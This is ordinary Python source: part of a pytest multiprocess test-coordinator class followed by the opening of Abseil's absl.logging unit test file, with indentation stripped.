        :param is_serving_remotes: whether the test/result queues must be proxied for remote worker clients
"""
self._tests: List[TestBatch] = [] # set later
self._count = 0
self._exit_results: List[ResultExit] = []
self._session_start_time = time.time()
if is_serving_remotes:
SyncManager.register("JoinableQueueProxy", JoinableQueue, JoinableQueueProxy)
SyncManager.register("QueueProxy", Queue, QueueProxy)
self._queue_manager = SyncManager(authkey=AUTHKEY)
self._queue_manager.start()
self._test_q: JoinableQueue = self._queue_manager.JoinableQueueProxy()
self._result_q: Queue = self._queue_manager.QueueProxy()
else:
self._test_q: JoinableQueue = JoinableQueue()
self._result_q: Queue = Queue()
self._reporter = BasicReporter()
self._exit_q = JoinableQueue()
self._host = host
self._port = port
self._mp_manager = self.Manager(self)
self._is_serving_remotes = is_serving_remotes
@property
def host(self):
return self._host
@property
def port(self):
return self._port
@staticmethod
def _write_sep(s, txt):
"""
write out text to stdout surrounded by repeated character
:param s: character to repeat on either side of given text
        :param txt: text to be surrounded
"""
sep_total = max((70 - 2 - len(txt)), 2)
sep_len = sep_total // 2
sep_extra = sep_total % 2
out = '%s %s %s\n' % (s * sep_len, txt, s * (sep_len + sep_extra))
sys.stdout.write(out)
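    # Example (illustrative): _write_sep('=', 'STATS') pads the line to roughly 70 columns,
    # writing 31 '=' characters, ' STATS ', then 32 '=' characters.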
def _output_summary(self, time_span: float, ucpu: float, scpu: float, unshared_mem: float):
"""
Output the summary of test execution
"""
self._write_sep('=', "STATS")
sys.stdout.write("User CPU, System CPU utilization, Add'l memory during run\n")
sys.stdout.write("---------------------------------------------------------\n")
for exit_result in self._exit_results:
if exit_result.test_count > 0:
sys.stdout.write(
f"Process Worker-{exit_result.worker_index} executed " +
f"{exit_result.test_count} tests in {exit_result.resource_utilization.time_span:.2f} " +
f"seconds; User CPU: {exit_result.resource_utilization.user_cpu:.2f}%, " +
f"Sys CPU: {exit_result.resource_utilization.system_cpu:.2f}%, " +
f"Mem consumed: {exit_result.resource_utilization.memory_consumed/1000.0}M\n")
else:
sys.stdout.write(f"Process Worker-{exit_result.worker_index} executed 0 tests\n")
sys.stdout.write("\n")
sys.stdout.write(
f"Process Coordinator executed in {time_span:.2f} seconds. " +
f"User CPU: {ucpu:.2f}%, Sys CPU: {scpu:.2f}%, " +
f"Mem consumed: {unshared_mem/1000.0}M\n"
)
length = sum([len(batch.test_ids) for batch in self._tests])
if self._count != length:
self._write_sep('!', "{} tests unaccounted for {} out of {}".format(length - self._count,
self._count, length))
sys.stdout.flush()
def _process_worker_message(self, hook, result: Union[ResultException, ResultExit, ResultTestStatus]):
"""
        Process a result message reported back by a worker process
        :param hook: pytest hook used to report results
        :param result: the result payload to be processed
"""
try:
if isinstance(result, ResultTestStatus):
if result.report.when == 'call' or (result.report.when == 'setup' and not result.report.passed):
self._count += 1
hook.pytest_runtest_logreport(report=result.report)
elif isinstance(result, ResultExit):
# process is complete, so close it and set to None
self._exit_results.append(result)
self._exit_q.put(result.worker_index)
elif isinstance(result, ResultException):
hook.pytest_internalerror(excrepr=result.excrepr, excinfo=None)
else:
raise Exception(f"Internal Error: Unknown result type: {type(result)}!!")
except Exception as e:
import traceback
traceback.print_exc()
sys.stdout.write("INTERNAL_ERROR> %s\n" % str(e))
def put_fixture(self, name, value):
self._mp_manager.put_fixture(name, value)
def fixtures(self):
return self._mp_manager._fixtures
def read_results(self, hook):
try:
result_batch: List[Union[ResultTestStatus, ResultException, ResultExit, None]] = self._result_q.get()
while result_batch is not None:
for result in result_batch:
if isinstance(result, ResultException):
hook.pytest_internalerror(excrepr=result.excrepr, excinfo=None)
else:
self._process_worker_message(hook,result)
result_batch = self._result_q.get()
except OSError:
pass
finally:
self._result_q.close()
def populate_test_queue(self, tests: List[TestBatch], end_sem):
try:
count = 0
for test_batch in tests:
# Function objects in pytest are not pickle-able, so have to send string nodeid and
# do lookup on worker side
self._test_q.put(test_batch)
count += 1
if count % 20 == 0 or count >= len(tests):
self._test_q.join()
client = self.Manager(addr=(self._host, self._port))
worker_count = client.count().value()
for index in range(worker_count):
self._test_q.put(None)
self._test_q.join()
self._test_q.close()
with suppress(RemoteError):
client.finalize()
self._result_q.put(None)
finally:
if end_sem:
end_sem.release()
def set_items(self, tests):
"""
:param tests: the items containing the pytest hooks to the tests to be run
"""
def priority(test) -> int:
return getattr(test._pyfuncitem.obj, "_pytest_priority", DEFAULT_PRIORITY)
grouped = [t for t in tests if getattr(t._pyfuncitem.obj, "_pytest_group", None)
or getattr(t._pyfuncitem, "_pytest_group", None)]
self._tests = [TestBatch([t.nodeid], priority(t)) for t in tests if t not in grouped]
groups: Dict["GroupTag", TestBatch] = {}
for test in grouped:
tag = test._pyfuncitem.obj._pytest_group if hasattr(test._pyfuncitem.obj, "_pytest_group") \
else test._pyfuncitem._pytest_group
groups.setdefault(tag, TestBatch([], tag.priority)).test_ids.append(test)
for tag, group in groups.items():
groups[tag].test_ids = [test.nodeid for test in sorted(group.test_ids, key=lambda x: priority(x))]
groups[tag].restriction = tag.restrict_to
self._tests.extend(groups.values())
self._tests = sorted(self._tests, key=lambda x: x.priority)
def run_loop(self, session):
"""
Populate test queue and continue to process messages from worker Processes until they complete
:param session: Pytest test session, to get session or config information
"""
start_rusage = resource.getrusage(resource.RUSAGE_SELF)
start_time = time.time()
# we are the root node, so populate the tests
populate_tests_process = Process(target=self.populate_test_queue, args=(self._tests, None))
populate_tests_process.start()
self.read_results(session.config.hook) # only master will read results and post reports through pytest
populate_tests_process.join(timeout=1) # should never time out since workers are done
end_rusage = resource.getrusage(resource.RUSAGE_SELF)
self._reporter.write("Shutting down..")
self._mp_manager.shutdown()
self._reporter.write("Shut down")
time_span = time.time() - start_time
rusage = resource_utilization(time_span=time_span, start_rusage=start_rusage, end_rusage=end_rusage)
sys.stdout.write("\r\n")
self._output_summary(rusage.time_span, rusage.user_cpu, rusage.system_cpu, rusage.memory_consumed)
@pytest.hookimpl(tryfirst=True)
    def pytest_fixture_setup(self, fixturedef, request):
        result = _pytest.fixtures.pytest_fixture_setup(fixturedef, request)
if fixturedef.scope == 'global':
self._mp_manager.put(fixturedef.argname, result)
return result
|
logging_test.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Unit tests for absl.logging."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import contextlib
import functools
import getpass
import io
import logging as std_logging
import os
import re
import socket
import sys
import tempfile
import threading
import time
import traceback
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import flagsaver
from absl.testing import parameterized
import mock
import six
from six.moves import range # pylint: disable=redefined-builtin
FLAGS = flags.FLAGS
_StreamIO = io.StringIO if six.PY3 else io.BytesIO # pylint: disable=invalid-name
class ConfigurationTest(absltest.TestCase):
"""Tests the initial logging configuration."""
def test_logger_and_handler(self):
absl_logger = std_logging.getLogger('absl')
self.assertIs(absl_logger, logging.get_absl_logger())
self.assertTrue(isinstance(absl_logger, logging.ABSLLogger))
self.assertTrue(
isinstance(logging.get_absl_handler().python_handler.formatter,
logging.PythonFormatter))
class LoggerLevelsTest(parameterized.TestCase):
def setUp(self):
super(LoggerLevelsTest, self).setUp()
# Since these tests muck with the flag, always save/restore in case the
# tests forget to clean up properly.
# enter_context() is py3-only, but manually enter/exit should suffice.
cm = self.set_logger_levels({})
cm.__enter__()
self.addCleanup(lambda: cm.__exit__(None, None, None))
@contextlib.contextmanager
def set_logger_levels(self, levels):
original_levels = {
name: std_logging.getLogger(name).level for name in levels
}
try:
with flagsaver.flagsaver(logger_levels=levels):
yield
finally:
for name, level in original_levels.items():
std_logging.getLogger(name).setLevel(level)
def assert_logger_level(self, name, expected_level):
logger = std_logging.getLogger(name)
self.assertEqual(logger.level, expected_level)
def assert_logged(self, logger_name, expected_msgs):
logger = std_logging.getLogger(logger_name)
# NOTE: assertLogs() sets the logger to INFO if not specified.
with self.assertLogs(logger, logger.level) as cm:
logger.debug('debug')
logger.info('info')
logger.warning('warning')
logger.error('error')
logger.critical('critical')
actual = {r.getMessage() for r in cm.records}
self.assertEqual(set(expected_msgs), actual)
@unittest.skipIf(six.PY2, 'Py2 is missing assertLogs')
def test_setting_levels(self):
# Other tests change the root logging level, so we can't
# assume it's the default.
orig_root_level = std_logging.root.getEffectiveLevel()
with self.set_logger_levels({'foo': 'ERROR', 'bar': 'DEBUG'}):
self.assert_logger_level('foo', std_logging.ERROR)
self.assert_logger_level('bar', std_logging.DEBUG)
self.assert_logger_level('', orig_root_level)
self.assert_logged('foo', {'error', 'critical'})
self.assert_logged('bar',
{'debug', 'info', 'warning', 'error', 'critical'})
@parameterized.named_parameters(
('empty', ''),
('one_value', 'one:INFO'),
('two_values', 'one.a:INFO,two.b:ERROR'),
('whitespace_ignored', ' one : DEBUG , two : INFO'),
)
def test_serialize_parse(self, levels_str):
fl = FLAGS['logger_levels']
fl.parse(levels_str)
expected = levels_str.replace(' ', '')
actual = fl.serialize()
self.assertEqual('--logger_levels={}'.format(expected), actual)
def test_invalid_value(self):
with self.assertRaisesRegex(ValueError, 'Unknown level.*10'):
FLAGS['logger_levels'].parse('foo:10')
class PythonHandlerTest(absltest.TestCase):
"""Tests the PythonHandler class."""
def setUp(self):
(year, month, day, hour, minute, sec,
dunno, dayofyear, dst_flag) = (1979, 10, 21, 18, 17, 16, 3, 15, 0)
self.now_tuple = (year, month, day, hour, minute, sec,
dunno, dayofyear, dst_flag)
self.python_handler = logging.PythonHandler()
def tearDown(self):
mock.patch.stopall()
@flagsaver.flagsaver(logtostderr=False)
def test_set_google_log_file_no_log_to_stderr(self):
with mock.patch.object(self.python_handler, 'start_logging_to_file'):
self.python_handler.use_absl_log_file()
self.python_handler.start_logging_to_file.assert_called_once_with(
program_name=None, log_dir=None)
@flagsaver.flagsaver(logtostderr=True)
def test_set_google_log_file_with_log_to_stderr(self):
self.python_handler.stream = None
self.python_handler.use_absl_log_file()
self.assertEqual(sys.stderr, self.python_handler.stream)
@mock.patch.object(logging, 'find_log_dir_and_names')
@mock.patch.object(logging.time, 'localtime')
@mock.patch.object(logging.time, 'time')
@mock.patch.object(os.path, 'islink')
@mock.patch.object(os, 'unlink')
@mock.patch.object(os, 'getpid')
def test_start_logging_to_file(
self, mock_getpid, mock_unlink, mock_islink, mock_time,
mock_localtime, mock_find_log_dir_and_names):
mock_find_log_dir_and_names.return_value = ('here', 'prog1', 'prog1')
mock_time.return_value = '12345'
mock_localtime.return_value = self.now_tuple
mock_getpid.return_value = 4321
symlink = os.path.join('here', 'prog1.INFO')
mock_islink.return_value = True
with mock.patch.object(
logging, 'open', return_value=sys.stdout, create=True):
if getattr(os, 'symlink', None):
with mock.patch.object(os, 'symlink'):
self.python_handler.start_logging_to_file()
mock_unlink.assert_called_once_with(symlink)
os.symlink.assert_called_once_with(
'prog1.INFO.19791021-181716.4321', symlink)
else:
self.python_handler.start_logging_to_file()
def test_log_file(self):
handler = logging.PythonHandler()
self.assertEqual(sys.stderr, handler.stream)
stream = mock.Mock()
handler = logging.PythonHandler(stream)
self.assertEqual(stream, handler.stream)
def test_flush(self):
stream = mock.Mock()
handler = logging.PythonHandler(stream)
handler.flush()
stream.flush.assert_called_once()
def test_flush_with_value_error(self):
stream = mock.Mock()
stream.flush.side_effect = ValueError
handler = logging.PythonHandler(stream)
handler.flush()
stream.flush.assert_called_once()
def test_flush_with_environment_error(self):
stream = mock.Mock()
stream.flush.side_effect = EnvironmentError
handler = logging.PythonHandler(stream)
handler.flush()
stream.flush.assert_called_once()
def test_flush_with_assertion_error(self):
stream = mock.Mock()
stream.flush.side_effect = AssertionError
handler = logging.PythonHandler(stream)
with self.assertRaises(AssertionError):
handler.flush()
def test_log_to_std_err(self):
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(std_logging.StreamHandler, 'emit'):
self.python_handler._log_to_stderr(record)
std_logging.StreamHandler.emit.assert_called_once_with(record)
@flagsaver.flagsaver(logtostderr=True)
def test_emit_log_to_stderr(self):
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(self.python_handler, '_log_to_stderr'):
self.python_handler.emit(record)
self.python_handler._log_to_stderr.assert_called_once_with(record)
def test_emit(self):
stream = _StreamIO()
handler = logging.PythonHandler(stream)
handler.stderr_threshold = std_logging.FATAL
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
handler.emit(record)
self.assertEqual(1, stream.getvalue().count('logging_msg'))
@flagsaver.flagsaver(stderrthreshold='debug')
def test_emit_and_stderr_threshold(self):
mock_stderr = _StreamIO()
stream = _StreamIO()
handler = logging.PythonHandler(stream)
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(sys, 'stderr', new=mock_stderr) as mock_stderr:
handler.emit(record)
self.assertEqual(1, stream.getvalue().count('logging_msg'))
self.assertEqual(1, mock_stderr.getvalue().count('logging_msg'))
@flagsaver.flagsaver(alsologtostderr=True)
def test_emit_also_log_to_stderr(self):
mock_stderr = _StreamIO()
stream = _StreamIO()
handler = logging.PythonHandler(stream)
handler.stderr_threshold = std_logging.FATAL
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(sys, 'stderr', new=mock_stderr) as mock_stderr:
handler.emit(record)
self.assertEqual(1, stream.getvalue().count('logging_msg'))
self.assertEqual(1, mock_stderr.getvalue().count('logging_msg'))
def test_emit_on_stderr(self):
mock_stderr = _StreamIO()
with mock.patch.object(sys, 'stderr', new=mock_stderr) as mock_stderr:
handler = logging.PythonHandler()
handler.stderr_threshold = std_logging.INFO
record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'logging_msg', [], False)
handler.emit(record)
self.assertEqual(1, mock_stderr.getvalue().count('logging_msg'))
def test_emit_fatal_absl(self):
stream = _StreamIO()
handler = logging.PythonHandler(stream)
record = std_logging.LogRecord(
'name', std_logging.FATAL, 'path', 12, 'logging_msg', [], False)
record.__dict__[logging._ABSL_LOG_FATAL] = True
with mock.patch.object(handler, 'flush') as mock_flush:
with mock.patch.object(os, 'abort') as mock_abort:
handler.emit(record)
mock_abort.assert_called_once()
mock_flush.assert_called() # flush is also called by super class.
def test_emit_fatal_non_absl(self):
stream = _StreamIO()
handler = logging.PythonHandler(stream)
record = std_logging.LogRecord(
'name', std_logging.FATAL, 'path', 12, 'logging_msg', [], False)
with mock.patch.object(os, 'abort') as mock_abort:
handler.emit(record)
mock_abort.assert_not_called()
def test_close(self):
stream = mock.Mock()
stream.isatty.return_value = True
handler = logging.PythonHandler(stream)
with mock.patch.object(handler, 'flush') as mock_flush:
with mock.patch.object(std_logging.StreamHandler, 'close') as super_close:
handler.close()
mock_flush.assert_called_once()
super_close.assert_called_once()
stream.close.assert_not_called()
def test_close_afile(self):
stream = mock.Mock()
stream.isatty.return_value = False
stream.close.side_effect = ValueError
handler = logging.PythonHandler(stream)
with mock.patch.object(handler, 'flush') as mock_flush:
with mock.patch.object(std_logging.StreamHandler, 'close') as super_close:
handler.close()
mock_flush.assert_called_once()
super_close.assert_called_once()
def test_close_stderr(self):
with mock.patch.object(sys, 'stderr') as mock_stderr:
mock_stderr.isatty.return_value = False
handler = logging.PythonHandler(sys.stderr)
handler.close()
mock_stderr.close.assert_not_called()
def test_close_stdout(self):
with mock.patch.object(sys, 'stdout') as mock_stdout:
mock_stdout.isatty.return_value = False
handler = logging.PythonHandler(sys.stdout)
handler.close()
mock_stdout.close.assert_not_called()
def test_close_original_stderr(self):
with mock.patch.object(sys, '__stderr__') as mock_original_stderr:
mock_original_stderr.isatty.return_value = False
handler = logging.PythonHandler(sys.__stderr__)
handler.close()
mock_original_stderr.close.assert_not_called()
def test_close_original_stdout(self):
with mock.patch.object(sys, '__stdout__') as mock_original_stdout:
mock_original_stdout.isatty.return_value = False
handler = logging.PythonHandler(sys.__stdout__)
handler.close()
mock_original_stdout.close.assert_not_called()
def test_close_fake_file(self):
class FakeFile(object):
"""A file-like object that does not implement "isatty"."""
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def flush(self):
pass
fake_file = FakeFile()
handler = logging.PythonHandler(fake_file)
handler.close()
self.assertTrue(fake_file.closed)
class PrefixFormatterTest(absltest.TestCase):
"""Tests the PrefixFormatter class."""
def setUp(self):
self.now_tuple = time.localtime(time.mktime(
(1979, 10, 21, 18, 17, 16, 3, 15, 1)))
self.new_prefix = lambda level: '(blah_prefix)'
mock.patch.object(time, 'time').start()
mock.patch.object(time, 'localtime').start()
self.record = std_logging.LogRecord(
'name', std_logging.INFO, 'path', 12, 'A Message', [], False)
self.formatter = logging.PythonFormatter()
def tearDown(self):
mock.patch.stopall()
@mock.patch.object(logging._thread_lib, 'get_ident')
def test_get_thread_id(self, mock_get_ident):
mock_get_ident.return_value = 12345
self.assertEqual(12345, logging._get_thread_id())
class ABSLHandlerTest(absltest.TestCase):
def setUp(self):
formatter = logging.PythonFormatter()
self.absl_handler = logging.ABSLHandler(formatter)
def test_activate_python_handler(self):
self.absl_handler.activate_python_handler()
self.assertEqual(
self.absl_handler._current_handler, self.absl_handler.python_handler)
class ABSLLoggerTest(absltest.TestCase):
"""Tests the ABSLLogger class."""
def set_up_mock_frames(self):
"""Sets up mock frames for use with the testFindCaller methods."""
logging_file = os.path.join('absl', 'logging', '__init__.py')
# Set up mock frame 0
mock_frame_0 = mock.Mock()
mock_code_0 = mock.Mock()
mock_code_0.co_filename = logging_file
mock_code_0.co_name = 'LoggingLog'
mock_code_0.co_firstlineno = 124
mock_frame_0.f_code = mock_code_0
mock_frame_0.f_lineno = 125
# Set up mock frame 1
mock_frame_1 = mock.Mock()
mock_code_1 = mock.Mock()
mock_code_1.co_filename = 'myfile.py'
mock_code_1.co_name = 'Method1'
mock_code_1.co_firstlineno = 124
mock_frame_1.f_code = mock_code_1
mock_frame_1.f_lineno = 125
# Set up mock frame 2
mock_frame_2 = mock.Mock()
mock_code_2 = mock.Mock()
mock_code_2.co_filename = 'myfile.py'
mock_code_2.co_name = 'Method2'
mock_code_2.co_firstlineno = 124
mock_frame_2.f_code = mock_code_2
mock_frame_2.f_lineno = 125
# Set up mock frame 3
mock_frame_3 = mock.Mock()
mock_code_3 = mock.Mock()
mock_code_3.co_filename = 'myfile.py'
mock_code_3.co_name = 'Method3'
mock_code_3.co_firstlineno = 124
mock_frame_3.f_code = mock_code_3
mock_frame_3.f_lineno = 125
# Set up mock frame 4 that has the same function name as frame 2.
mock_frame_4 = mock.Mock()
mock_code_4 = mock.Mock()
mock_code_4.co_filename = 'myfile.py'
mock_code_4.co_name = 'Method2'
mock_code_4.co_firstlineno = 248
mock_frame_4.f_code = mock_code_4
mock_frame_4.f_lineno = 249
# Tie them together.
mock_frame_4.f_back = None
mock_frame_3.f_back = mock_frame_4
mock_frame_2.f_back = mock_frame_3
mock_frame_1.f_back = mock_frame_2
mock_frame_0.f_back = mock_frame_1
mock.patch.object(sys, '_getframe').start()
sys._getframe.return_value = mock_frame_0
def setUp(self):
self.message = 'Hello Nurse'
self.logger = logging.ABSLLogger('')
def tearDown(self):
mock.patch.stopall()
self.logger._frames_to_skip.clear()
def test_constructor_without_level(self):
self.logger = logging.ABSLLogger('')
self.assertEqual(std_logging.NOTSET, self.logger.getEffectiveLevel())
def test_constructor_with_level(self):
self.logger = logging.ABSLLogger('', std_logging.DEBUG)
self.assertEqual(std_logging.DEBUG, self.logger.getEffectiveLevel())
def test_find_caller_normal(self):
self.set_up_mock_frames()
expected_name = 'Method1'
self.assertEqual(expected_name, self.logger.findCaller()[2])
def test_find_caller_skip_method1(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
expected_name = 'Method2'
self.assertEqual(expected_name, self.logger.findCaller()[2])
def test_find_caller_skip_method1_and_method2(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
self.logger.register_frame_to_skip('myfile.py', 'Method2')
expected_name = 'Method3'
self.assertEqual(expected_name, self.logger.findCaller()[2])
def test_find_caller_skip_method1_and_method3(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
# Skipping Method3 should change nothing since Method2 should be hit.
self.logger.register_frame_to_skip('myfile.py', 'Method3')
expected_name = 'Method2'
self.assertEqual(expected_name, self.logger.findCaller()[2])
def test_find_caller_skip_method1_and_method4(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
# Skipping frame 4's Method2 should change nothing for frame 2's Method2.
self.logger.register_frame_to_skip('myfile.py', 'Method2', 248)
expected_name = 'Method2'
expected_frame_lineno = 125
self.assertEqual(expected_name, self.logger.findCaller()[2])
self.assertEqual(expected_frame_lineno, self.logger.findCaller()[1])
def test_find_caller_skip_method1_method2_and_method3(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
self.logger.register_frame_to_skip('myfile.py', 'Method2', 124)
self.logger.register_frame_to_skip('myfile.py', 'Method3')
expected_name = 'Method2'
expected_frame_lineno = 249
self.assertEqual(expected_name, self.logger.findCaller()[2])
self.assertEqual(expected_frame_lineno, self.logger.findCaller()[1])
def test_find_caller_stack_info(self):
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
with mock.patch.object(traceback, 'print_stack') as print_stack:
self.assertEqual(
('myfile.py', 125, 'Method2', 'Stack (most recent call last):'),
self.logger.findCaller(stack_info=True))
print_stack.assert_called_once()
@unittest.skipIf(six.PY3, 'Testing Python 2 specific behavior.')
def test_find_caller_python2(self):
"""Ensure that we only return three items for base class compatibility."""
self.set_up_mock_frames()
self.logger.register_frame_to_skip('myfile.py', 'Method1')
self.assertEqual(('myfile.py', 125, 'Method2'), self.logger.findCaller())
def test_critical(self):
with mock.patch.object(self.logger, 'log'):
self.logger.critical(self.message)
self.logger.log.assert_called_once_with(
std_logging.CRITICAL, self.message)
def test_fatal(self):
with mock.patch.object(self.logger, 'log'):
self.logger.fatal(self.message)
self.logger.log.assert_called_once_with(std_logging.FATAL, self.message)
def test_error(self):
with mock.patch.object(self.logger, 'log'):
self.logger.error(self.message)
self.logger.log.assert_called_once_with(std_logging.ERROR, self.message)
def test_warn(self):
with mock.patch.object(self.logger, 'log'):
self.logger.warn(self.message)
self.logger.log.assert_called_once_with(std_logging.WARN, self.message)
def test_warning(self):
with mock.patch.object(self.logger, 'log'):
self.logger.warning(self.message)
self.logger.log.assert_called_once_with(std_logging.WARNING, self.message)
def test_info(self):
with mock.patch.object(self.logger, 'log'):
self.logger.info(self.message)
self.logger.log.assert_called_once_with(std_logging.INFO, self.message)
def test_debug(self):
with mock.patch.object(self.logger, 'log'):
self.logger.debug(self.message)
self.logger.log.assert_called_once_with(std_logging.DEBUG, self.message)
def test_log_debug_with_python(self):
with mock.patch.object(self.logger, 'log'):
FLAGS.verbosity = 1
self.logger.debug(self.message)
self.logger.log.assert_called_once_with(std_logging.DEBUG, self.message)
def test_log_fatal_with_python(self):
with mock.patch.object(self.logger, 'log'):
self.logger.fatal(self.message)
self.logger.log.assert_called_once_with(std_logging.FATAL, self.message)
def test_register_frame_to_skip(self):
# This is basically just making sure that if I put something in a
# list, it actually appears in that list.
frame_tuple = ('file', 'method')
self.logger.register_frame_to_skip(*frame_tuple)
self.assertIn(frame_tuple, self.logger._frames_to_skip)
def test_register_frame_to_skip_with_lineno(self):
frame_tuple = ('file', 'method', 123)
self.logger.register_frame_to_skip(*frame_tuple)
self.assertIn(frame_tuple, self.logger._frames_to_skip)
def test_logger_cannot_be_disabled(self):
self.logger.disabled = True
record = self.logger.makeRecord(
'name', std_logging.INFO, 'fn', 20, 'msg', [], False)
with mock.patch.object(self.logger, 'callHandlers') as mock_call_handlers:
self.logger.handle(record)
mock_call_handlers.assert_called_once()
class ABSLLogPrefixTest(parameterized.TestCase):
def setUp(self):
self.record = std_logging.LogRecord(
'name', std_logging.INFO, 'path/to/source.py', 13, 'log message',
None, None)
@parameterized.named_parameters(
('debug', std_logging.DEBUG, 'I'),
('info', std_logging.INFO, 'I'),
('warning', std_logging.WARNING, 'W'),
('error', std_logging.ERROR, 'E'),
)
def test_default_prefixes(self, levelno, level_prefix):
self.record.levelno = levelno
self.record.created = 1494293880.378885
thread_id = '{: >5}'.format(logging._get_thread_id())
# Use UTC so the test passes regardless of the local time zone.
with mock.patch.object(time, 'localtime', side_effect=time.gmtime):
self.assertEqual(
'{}0509 01:38:00.378885 {} source.py:13] '.format(
level_prefix, thread_id),
logging.get_absl_log_prefix(self.record))
time.localtime.assert_called_once_with(self.record.created)
def test_absl_prefix_regex(self):
self.record.created = 1226888258.0521369
# Use UTC so the test passes regardless of the local time zone.
with mock.patch.object(time, 'localtime', side_effect=time.gmtime):
prefix = logging.get_absl_log_prefix(self.record)
match = re.search(logging.ABSL_LOGGING_PREFIX_REGEX, prefix)
self.assertTrue(match)
expect = {'severity': 'I',
'month': '11',
'day': '17',
'hour': '02',
'minute': '17',
'second': '38',
'microsecond': '052136',
'thread_id': str(logging._get_thread_id()),
'filename': 'source.py',
'line': '13',
}
actual = {name: match.group(name) for name in expect}
self.assertEqual(expect, actual)
def test_critical_absl(self):
self.record.levelno = std_logging.CRITICAL
self.record.created = 1494293880.378885
self.record._absl_log_fatal = True
thread_id = '{: >5}'.format(logging._get_thread_id())
# Use UTC so the test passes regardless of the local time zone.
with mock.patch.object(time, 'localtime', side_effect=time.gmtime):
self.assertEqual(
'F0509 01:38:00.378885 {} source.py:13] '.format(thread_id),
logging.get_absl_log_prefix(self.record))
time.localtime.assert_called_once_with(self.record.created)
def test_critical_non_absl(self):
self.record.levelno = std_logging.CRITICAL
self.record.created = 1494293880.378885
thread_id = '{: >5}'.format(logging._get_thread_id())
# Use UTC so the test passes regardless of the local time zone.
with mock.patch.object(time, 'localtime', side_effect=time.gmtime):
self.assertEqual(
'E0509 01:38:00.378885 {} source.py:13] CRITICAL - '.format(
thread_id),
logging.get_absl_log_prefix(self.record))
time.localtime.assert_called_once_with(self.record.created)
class LogCountTest(absltest.TestCase):
def test_counter_threadsafe(self):
threads_start = threading.Event()
counts = set()
k = object()
def t():
threads_start.wait()
counts.add(logging._get_next_log_count_per_token(k))
threads = [threading.Thread(target=t) for _ in range(100)]
for thread in threads:
thread.start()
threads_start.set()
for thread in threads:
thread.join()
self.assertEqual(counts, {i for i in range(100)})
class LoggingTest(absltest.TestCase):
def test_fatal(self):
with mock.patch.object(os, 'abort') as mock_abort:
logging.fatal('Die!')
mock_abort.assert_called_once()
def test_find_log_dir_with_arg(self):
with mock.patch.object(os, 'access'), \
mock.patch.object(os.path, 'isdir'):
os.path.isdir.return_value = True
os.access.return_value = True
log_dir = logging.find_log_dir(log_dir='./')
self.assertEqual('./', log_dir)
@flagsaver.flagsaver(log_dir='./')
def test_find_log_dir_with_flag(self):
with mock.patch.object(os, 'access'), \
mock.patch.object(os.path, 'isdir'):
os.path.isdir.return_value = True
os.access.return_value = True
log_dir = logging.find_log_dir()
self.assertEqual('./', log_dir)
@flagsaver.flagsaver(log_dir='')
def test_find_log_dir_with_hda_tmp(self):
with mock.patch.object(os, 'access'), \
mock.patch.object(os.path, 'exists'), \
mock.patch.object(os.path, 'isdir'):
os.path.exists.return_value = True
os.path.isdir.return_value = True
os.access.return_value = True
log_dir = logging.find_log_dir()
self.assertEqual('/tmp/', log_dir)
@flagsaver.flagsaver(log_dir='')
def test_find_log_dir_with_tmp(self):
with mock.patch.object(os, 'access'), \
mock.patch.object(os.path, 'exists'), \
mock.patch.object(os.path, 'isdir'):
os.path.exists.return_value = False
os.path.isdir.side_effect = lambda path: path == '/tmp/'
os.access.return_value = True
log_dir = logging.find_log_dir()
self.assertEqual('/tmp/', log_dir)
def test_find_log_dir_with_nothing(self):
with mock.patch.object(os.path, 'exists'), \
mock.patch.object(os.path, 'isdir'), \
mock.patch.object(logging.get_absl_logger(), 'fatal') as mock_fatal:
os.path.exists.return_value = False
os.path.isdir.return_value = False
log_dir = logging.find_log_dir()
mock_fatal.assert_called()
self.assertEqual(None, log_dir)
def test_find_log_dir_and_names_with_args(self):
user = 'test_user'
host = 'test_host'
log_dir = 'here'
program_name = 'prog1'
with mock.patch.object(getpass, 'getuser'), \
mock.patch.object(logging, 'find_log_dir') as mock_find_log_dir, \
mock.patch.object(socket, 'gethostname') as mock_gethostname:
getpass.getuser.return_value = user
mock_gethostname.return_value = host
mock_find_log_dir.return_value = log_dir
prefix = '%s.%s.%s.log' % (program_name, host, user)
self.assertEqual((log_dir, prefix, program_name),
logging.find_log_dir_and_names(
program_name=program_name, log_dir=log_dir))
def test_find_log_dir_and_names_without_args(self):
user = 'test_user'
host = 'test_host'
log_dir = 'here'
py_program_name = 'py_prog1'
sys.argv[0] = 'path/to/prog1'
with mock.patch.object(getpass, 'getuser'), \
mock.patch.object(logging, 'find_log_dir') as mock_find_log_dir, \
mock.patch.object(socket, 'gethostname'):
getpass.getuser.return_value = user
socket.gethostname.return_value = host
mock_find_log_dir.return_value = log_dir
prefix = '%s.%s.%s.log' % (py_program_name, host, user)
self.assertEqual((log_dir, prefix, py_program_name),
logging.find_log_dir_and_names())
def test_find_log_dir_and_names_wo_username(self):
# Windows doesn't have os.getuid at all
if hasattr(os, 'getuid'):
mock_getuid = mock.patch.object(os, 'getuid')
uid = 100
logged_uid = '100'
else:
